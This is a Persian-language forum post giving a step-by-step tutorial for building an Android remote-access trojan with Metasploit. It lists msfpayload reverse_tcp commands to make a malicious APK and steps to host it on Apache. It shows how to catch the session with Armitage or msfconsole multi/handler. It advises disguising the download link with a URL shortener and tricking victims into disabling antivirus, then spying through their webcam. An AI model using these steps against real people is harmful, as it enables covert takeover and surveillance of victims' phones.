تبلیغات در اینترنتclose
ساخت رت با متاسپلویت
زمان جاری : یکشنبه 30 تیر 1398 - 11:03 قبل از ظهر
نام کاربری : پسورد : یا عضویت | رمز عبور را فراموش کردم





تبلیغات در اینترنتclose

ارسال پاسخ
تعداد بازدید 168
نویسنده پیام
overtur آفلاین


ارسال‌ها : 33
عضویت: 12 /12 /1396
محل زندگی: ____

تشکر شده : 8
ساخت رت با متاسپلویت
اول یه اکسپلویت میسازیم با استفاده از ابزار msfpayload
1:درمحیط ترمینال مینویسیم
msfpayload android/meterpreter/reverse_tcp LHOST= LPORT= R >
خب این فرمول،کاری نداره حالا جا گزاری میکنیم ای پی من 192.168.1.2 پورتی که میخوام کانکت شیم 81 اسم برنامه مثلا soroush.apk بعد میبیند که در home قرار داره تو عکس .جاگزاری فرمول تو عکس معلومه و بعد سرور apache2 را استارت میکنیم و فایل را قرار میدیم با دستور
1:service apache2 start
اپاچی استارت میشه و بعد برای قرار دادن فایل در سرور برای دادن به قربانی از دستور زیر استفاده میکنیم
2:cp /root/soroush.apk /var/www/
جای سروش هر اسمی که برای برنامه در حین ساختن گزاشتید بزارید خب این تا الان بعد انجام اون کارها دو راه داریم یا با محیط گرافیکی ارمتیج یا کد نویسی که دوتاشو میگم خب برای اجرای ارمتیج اول متااکسپلوییت رو فعال میکنیم سرورش رو برای این کار مراجعه میکنیم به applications>kali Linux>system services>metasploit>community / pro start میزنیم و ترمینال باز میشه صبر کنید تا همه چی استارت و ok بشه بعد بنویسید armitage صبر کنید تا یک صفحه بیاد به چیزیش دست نزنید لازم نداره رو گزینه connect کلیک کنید بعد yes صبر کنید تا پر بشه بعد یه محیط گرافیکی باز میشه اون بالا سمت چپ مثل عکس که شماره گزاری کردم بر روی payload کلیک کنید بعد روی android و بعد روی meterpreter و بعد روی reverse_tcp که یه صفحه باز میشه LHOST که همون ای پی هست ولی اگه نبود عوض کنید پورت رو‌عوض کنید تبدیل به پورتی کنید که تو اکسپولییت درست کردن نوشتید برای listen کردن و بعد روی Launch کلیک کنید دقت کنید پورت انتخاب شده باشه حالا هلو بپر تو گلو یادتونه برنامتون رو روی اپاچی گزاشتید خب حالا ایپیتون رو رو قبل از اسم برنامه با یه / بزارید مثلا مال من میشه
192.168.1.2/soroush.apk
برای اینکه طرف به لینکتون شک نکنه میتونید لینک هاتونو کوتاه کنید مثلا برید تو این سایت شکل لینک عوض میشه و شک نمیکنن
http://1o2.ir/
که لینکه مستقیمه بعد بعد از نصب برنامه توسط قربانی و وارد شدن با ان شما دسترسی میگیرین و باید با این پیغام مواجه بشید
Meterpreter session 1 opened بقیشم نمینویسم
بعد میتونید تا وبک و ....هک کنید دستور help رو بزنید تا کدها رو بیاره بعد من یه فیلم اپلود میکنم خیلی راحت همه چی گیراس که یکی از دوستان که هکره ایرانی نیست درست کردن چون من درست کردم دیدم زمانش دو برابر این شد البته من یزره بیشتر توضیح داده بودم و چون سرعت نتش بالاس در وقت کمتری ریکورد کرد من تا بیام بزنم وبکمش بیاد دو سه دقیقه طول میکشه ولی ایشون تا میزنه میاد البته دوستان انتی ویروس به شدت بهش گیر میده و نمیزاره اصلا شما باید از طریق مهندسی اجتماعی طرف رو گول بزنید بگید مثلا باید اف کنی تا این کار کنه و از این جور حرفا و روش دیگه اینه که کریپتش کنید مثلا انتی ویروس رو دور بزنید که برا این سو استفاده نشه از گزاشتن این اموزش معذورم‌و خیلی هم مبحث زیادیه و پیچیده و بخاطر این عکس که بد شد عذر میخوام دیگه حوصله نداشتم تمیز کار کنم اهان روش کد نویسی رو نگفتم البته من روش بالا رو پیشنهاد میکنم ولی خب شاید بعضی دوست داشته باشن اینطوری کار کنن وارد ترمینال میشیم
1:msfconsole
رو تایپ کنید تا به محیط metasploit console بروید
2:use exploit/multi/handler
3:set payload android/meterpreter/reverse_tcp
4:set LHOST باز ایپی خودتون رو در اینجا بنوسید
5:set LPORT همون پورت برا متصل شدن اینجا بنوسید
6:exploit
خب اگه درست رفته باشید با پیغام زیر مواجه میشید و از اون جایی که payload ما reverse_tcp است که در ان هکر منتظر اتصال قربانی به ماشین خود و....
[×] started reverse handler on .......
[×] starting the payload handler ...
و بقیش مثل‌اون لینک‌رو میدیم با نصب و اجراش تمومه
توجه مسیولیت اینکار بر عهده ی خودتونه
برای فهمیدن ای پیتون دستور ifconfig
Inet addr:ای پی شما

جمعه 18 اسفند 1396 - 05:39
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
[RB:Blog_Keywords_Tags] اشرارتیم
تشکر شده: 1 کاربر از overtur به خاطر این مطلب مفید تشکر کرده اند: guh &
ارسال پاسخ



برای ارسال پاسخ ابتدا باید لوگین یا ثبت نام کنید.


پرش به انجمن :


تماس با ما | ساخت رت با متاسپلویت | بازگشت به بالا | پیوند سایتی RSS
تاپیک های مرتبط
موضوع تاریخ تعداد پاسخ آخرین ارسال بازدید
[Post_Title] [Post_Date] [Post_Answer] [Post_Last_User] [Post_Hit]